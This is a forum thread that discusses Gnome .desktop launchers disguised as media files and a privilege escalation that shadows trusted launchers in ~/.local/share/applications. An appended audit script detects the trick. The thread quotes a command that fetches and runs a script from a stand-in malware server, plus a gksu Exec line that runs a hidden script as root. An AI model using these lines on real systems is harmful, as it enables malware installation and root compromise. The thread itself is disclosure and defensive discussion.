LinuxQuestions.org
Old 03-23-2012, 04:11 AM   #1
addux
Member
 
Registered: Dec 2006
Location: In the middle of the ocean.
Distribution: Ubuntu 12.04, Debian Squeeze, Windows 7
Posts: 67

Rep: Reputation: 16
Possible ~/.local/share/applications privilege escalation in Gnome


Perhaps this has been discussed elsewhere, I looked but didn't see, sorry.

I recently read an article about the changing face of the Linux desktop environment, most importantly that it seems to be drastically deviating from the *nix practices that make Linux 'safer'.

The article discussed the *.desktop file suffix and how this "feature" made possible the previously unlikely event of downloading a text file, double-clicking and executing a malicious command without knowing. Not only did this feature make a double-clicked text file executable (technically not true, but the end result is the execution of a command after clicking), it also hides the .desktop suffix, and you can name the file something like Really_Cool_Song.mp3. You can also point this file to an icon of your choice (located on the system in a default location) to make it look like something music related. Now you have downloaded an executable file that has an icon you equate with music and a misleading name of Really_Cool_Song.mp3 with the .desktop suffix hidden. You double click to listen and instead some serious pwnage ensues. Game over, that is it. It doesn't have to be an mp3 of course; it could be any fake file extension and any misleading icon.

The example given was executing this command:
% bash -c "curl h++p://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

Now you have executed a complex script that could run anything from a number of local root exploits to do further damage **I understand these are generally found and patched relatively quickly, but I am assuming this attacker has found a new one or is testing for an unpatched system** or, 99% of the time, just access to the average desktop user's files is damage enough.

If the system is patched and the local root exploit fails, the author explains a clever and easy privilege escalation tactic. In ~/.local/share/applications one can add their own 'hidden' .desktop launcher file to execute whatever they want as root. When you execute synaptic by clicking its icon from the Gnome menu, a Gnome environment variable tells the program to check your local folder; then, if nothing is there, it uses /usr/share/applications where the appropriate uneditable one resides.

Here is a line that could be slipped into the hacker's custom launcher file:
Exec=gksu python .local/.hidden/s.py /usr/sbin/synaptic

You can try this at home!:
cp /usr/share/applications/synaptic.desktop ~/.local/share/applications
Use your favorite editor and edit the "Exec=" line, adding whatever root command you want; keep in mind that if the command gksu/sudo (for me su-to-root) is there you have to leave it. Just squeeze the extra command after the sudo but before /usr/sbin/synaptic.
Here is one where I launch wireshark & synaptic as root by launching synaptic:
Exec=gksu /usr/bin/wireshark& /usr/sbin/synaptic
Obviously if you try this don't do something detrimental to your own computer!!

This idea is a bit of a guessing game but it is pretty safe to assume you will run a trusted program such as update manager or synaptic sooner or later (using Debian or Ubuntu) now when you click synaptic from your Gnome menu you run synaptic and the hacker's not-so-arbitrary code as root, again game over. All of this done initially with user privileges.

All the typical what-ifs aside, this was a very real possibility only 1-2 years ago, when 10 years ago this would have never happened. The *.desktop issue has more or less been fixed: if you download a file with .desktop you can no longer just click and run (there is a prompt now that says the file is untrusted, so you can still run it, but more steps should keep execution very unlikely) and the .desktop suffix isn't hidden, thus raising lots of red flags....hopefully. Although gaining remote user privileges is a bit harder again, the escalation issue that was raised has been ignored. How can something so simple be overlooked for so long, when *nix boasts security? This is an ungodly simple escalation exploit and begs the question: how much more will the mainstream *nix development move away from its previously strong security practices? Is there any easy way to keep this sort of command re-direct from taking place at a user level?

kim

Post Script
I do want to say that I believe the .desktop launcher slip-up, if Gnome were in Windows' spot, would have been fixed within a matter of a few days once in the wild, but a lot of machines would still be compromised due to this stupid feature. This still leaves the question of why? why? why? why? would you bypass one of the simple-but-great features of Linux for end-user ease of use? This sounds like the motto of the MS of the past. MS has even copied the better features of *nix because they work so well.

Last edited by addux; 03-23-2012 at 08:01 PM.
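As an added example (not part of the original post), here is a small audit script that checks a user-local launcher directory for the override described above: a .desktop file that shadows a system launcher of the same name with a different Exec line, or whose Exec line invokes a root-elevating helper such as gksu or su-to-root. The two directories and the launcher contents are constructed samples standing in for /usr/share/applications and ~/.local/share/applications.

```python
import tempfile
from pathlib import Path

# Helpers that hand root to whatever follows them on the Exec line.
ELEVATORS = ("gksu", "gksudo", "sudo", "su-to-root", "pkexec")


def exec_command(path: Path):
    """Return the value of the Exec= key of a .desktop file, or None."""
    for line in path.read_text(errors="replace").splitlines():
        if line.startswith("Exec="):
            return line[len("Exec="):].strip()
    return None


def audit_launchers(system_dir: Path, user_dir: Path) -> list:
    """Flag user-local launchers that shadow a system launcher with a
    changed Exec line, or that run anything through a root helper.
    Any root-elevating launcher in a user-writable dir merits review,
    even if it is a verbatim copy, since the user can edit it later."""
    flagged = []
    for entry in sorted(user_dir.glob("*.desktop")):
        cmd = exec_command(entry) or ""
        twin = system_dir / entry.name
        shadows_with_change = twin.exists() and cmd != exec_command(twin)
        # Split on '&' too, so "gksu a& b" is tokenised like the post's example.
        elevates = any(tok in ELEVATORS for tok in cmd.replace("&", " ").split())
        if shadows_with_change or elevates:
            flagged.append(entry.name)
    return flagged


# Constructed sample, not taken from a real system: "system/" stands in for
# /usr/share/applications and "user/" for ~/.local/share/applications.
SAMPLE = {
    "system/synaptic.desktop": "[Desktop Entry]\nName=Synaptic\nExec=gksu /usr/sbin/synaptic\nType=Application\n",
    "user/synaptic.desktop": "[Desktop Entry]\nName=Synaptic\nExec=gksu /usr/bin/wireshark& /usr/sbin/synaptic\nType=Application\n",
    "user/notes.desktop": "[Desktop Entry]\nName=Notes\nExec=gedit %U\nType=Application\n",
}


def run_demo() -> list:
    """Materialise the sample tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, body in SAMPLE.items():
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
        return audit_launchers(root / "system", root / "user")


if __name__ == "__main__":
    print(run_demo())  # ['synaptic.desktop']
```

On a real machine, point audit_launchers at Path("/usr/share/applications") and Path.home() / ".local/share/applications"; the benign notes.desktop is left alone while the shadowing synaptic.desktop is reported.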
 
Old 03-24-2012, 01:01 AM   #2
addux
Member
 
Registered: Dec 2006
Location: In the middle of the ocean.
Distribution: Ubuntu 12.04, Debian Squeeze, Windows 7
Posts: 67

Original Poster
Rep: Reputation: 16
Just to add

Also, I say this issue has been fixed; however, if you download a .tar.bz2 with the execute permission set before archiving, unarchive it and you've got the same deception and the same stupid feature. This just reinforces the need to download only from trusted sources and stay informed.